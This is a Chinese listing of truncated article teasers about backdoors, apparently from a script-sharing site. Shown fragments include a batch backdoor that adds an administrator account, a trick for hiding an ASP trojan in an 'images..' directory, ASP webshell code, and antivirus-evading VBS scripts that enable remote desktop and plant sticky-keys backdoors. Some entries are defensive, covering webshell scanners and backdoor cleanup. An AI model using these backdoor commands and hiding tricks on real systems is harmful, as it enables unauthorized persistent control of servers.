wsc后门

利用wsc制作的一个asp后门 2015-07-15

ScriptCodingInfo.wsc代码如下,该文件可以改成任意后缀<?xml version="1.0" encoding="gb2312" standalone="yes"?> <?component error="true" debug="true" ...

批处理bat之永不被杀的后门 2016-01-11

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:     代码如下:@echo off     @attrib +s + r xyt.bat    @net user xyt hacker /add     @net localgroup administrators xyt / ...

隐藏ASP木马后门的两种方法 2016-02-10

下面的两种方法可以将你的asp木马隐藏,大家可以测试下1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login ...

几种另类的ASP后门 2015-08-20

asp后门 另类的ASP后门<%  'code by netpatch dim dbfile,sql  db="netpatch.asp" dbfile=server.MapPath(db)  set ydb=server.CreateObject("ADOX.Catalog")  ydb.Create "Provid ...

七步倒┈→专用asp后门 2016-03-16

<html> <head> <title>七步倒┈→专用asp后门</title> </head> </html> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next% ...

Linux下查找后门程序CentOS查后门程序的shell脚本 2015-11-13

这篇文章主要介绍了Linux下查找后门程序 CentOS 查后门程序的shell脚本,需要的朋友可以参考下每个进程都会有一个PID,而每一个PID都会在/proc目录下有一个相应的目录,这是linux(当前内核2.6)系统的实现.一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit.假如是 ...

可自删除开启3389创建用户粘滞键后门的vbs 2016-04-27

开启3389创建用户粘滞键后门,作研究使用,请勿违法.on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{imperso ...

Vbs脚本实现radmin终极后门代码_删除自身 2015-11-26

在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀.所以本人把自己写的脚本提供大家分享.比较实用,希望大家喜欢. 代码如下:on error resume next  const HKEY_LOCAL_MACHINE = &H80000002  strComputer = "."  Set StdOut = WScript.St ...

C++映像劫持后门实例分析 2015-12-25

这篇文章主要介绍了C++映像劫持后门,实例分析了C++映像劫持后门的原理与相关实现技巧,有助于进一步了解后门的原理,需要的朋友可以参考下本文实例讲述了C++映像劫持后门的方法.分享给大家供大家参考.具体如下: // freeheart.cpp : Defines the entry point for the console application. //学习交流使用,违法 ...

PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode) 2015-10-02

今天一个客户的服务器频繁被写入一句话后门,删除了还有,原来在程序中加入了如下代码,大家可以注意下base64_decode函数的参数.今天一个客户的服务器频繁被写入: mm.php 内容为: <div> '; set_time_limit(0); class PHPzip { var $file_count = 0 ; var $datastr_len = 0; ...

超小PHP小马小结(方便查找后门的朋友) 2015-12-25

超小PHP小马小结,方便查找后门的朋友,发现相关类似代码可以直接封杀了作者: spider 我也来个超小PHP小马 代码如下: <?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v ...

php后门URL的防范 2015-07-17

后门URL是指虽然无需直接调用的资源能直接通过URL访问例如,下面WEB应用可能向登入用户显示敏感信息: 代码如下:<?php$authenticated = FALSE;$authenticated = check_auth();if ($authenticated){    include './sensitive.php';}?>由于sensitive.p ...

用php实现批量查询清除一句话后门的代码 2016-02-13

一句话后门一般简单,容易隐藏危害大,查找麻烦等.今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了总是忘记一句话放到哪个文件里去了,直接全部干掉... 代码如下:<?//xy7  if (!isset($dir) or empty($dir)) {  $dir=str_replace('\\','/',dirname(__FILE_ ...

一些PHP管理系统程序中的后门 2015-11-22

一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全.我倒不怎么关心提示框,SABLOG怎么知道我的版本有漏洞呢,程序肯定有后门.每次登陆后台自动检测官方版本跟当前版本对比.嗯.后来找到了.在templates/admin/main.php最后的一部分.删掉如下代码就OK了. 其实这个不足以导致被黑的,现在一般有点常识的,密码都比较复杂,几个数字 ...

xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs 2015-09-05

喜欢VBS脚本的朋友可以下载使用.此脚本免杀,可以用于WebShell提供时使用,适用于2003系统和XP系统. 代码如下:on error resume next  const HKEY_LOCAL_MACHINE = &H80000002  strComputer = "."  Set StdOut = WScript.StdOut  Set ...

慎用preg_replace危险的/e修饰符(一句话后门常用) 2016-03-16

要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace 的行中出现语法解析错误preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 ...

python脚本实现查找webshell的方法 2016-04-27

这篇文章主要介绍了python脚本实现查找webshell的方法,是很实用的一个功能,需要的朋友可以参考下本文讲述了一个python查找 webshell脚本的代码,除了查找webshell功能之外还具有白名单功能,以及发现恶意代码发送邮件报警等功能,感兴趣的朋友可以自己测试一下看看效果. 具体的功能代码如下: #!/usr/bin/env python #-*- codi ...

CMD下的网络安全配置方法 2015-09-02

自带的关于网络的命令行工具很多,比如大家熟悉的ping,tracert,ipconfig,telnet,ftp,tftp,netstat,还有不太熟悉的nbtstat,pathping,nslookup,finger,route,netsh...... 这些命令又可分成三类:网络检测(如ping).网络连接(如telnet)和网络配置(如netsh).前面两种相对简单,本文 ...

CMD下建立虚拟目录的方法 2016-05-04

以下是丑要饭的<web数据分离>    web 和 数据分离,有Pcanywhere,数据库服务器有 IIS, cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口 cscript.exe c:\inetpub\adminscripts\a ...

phpeval函数用法PHP中eval()函数小技巧 2016-03-14

本函式可将字符串之中的变量值代入,通常用在处理数据库的数据上eval 将值代入字符串之中. 语法: void eval(string code_str); 传回值: 无 函式种类: 数据处理 内容说明 本函式可将字符串之中的变量值代入,通常用在处理数据库的数据上.参数 code_str 为欲处理的字符串.值得注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要 ...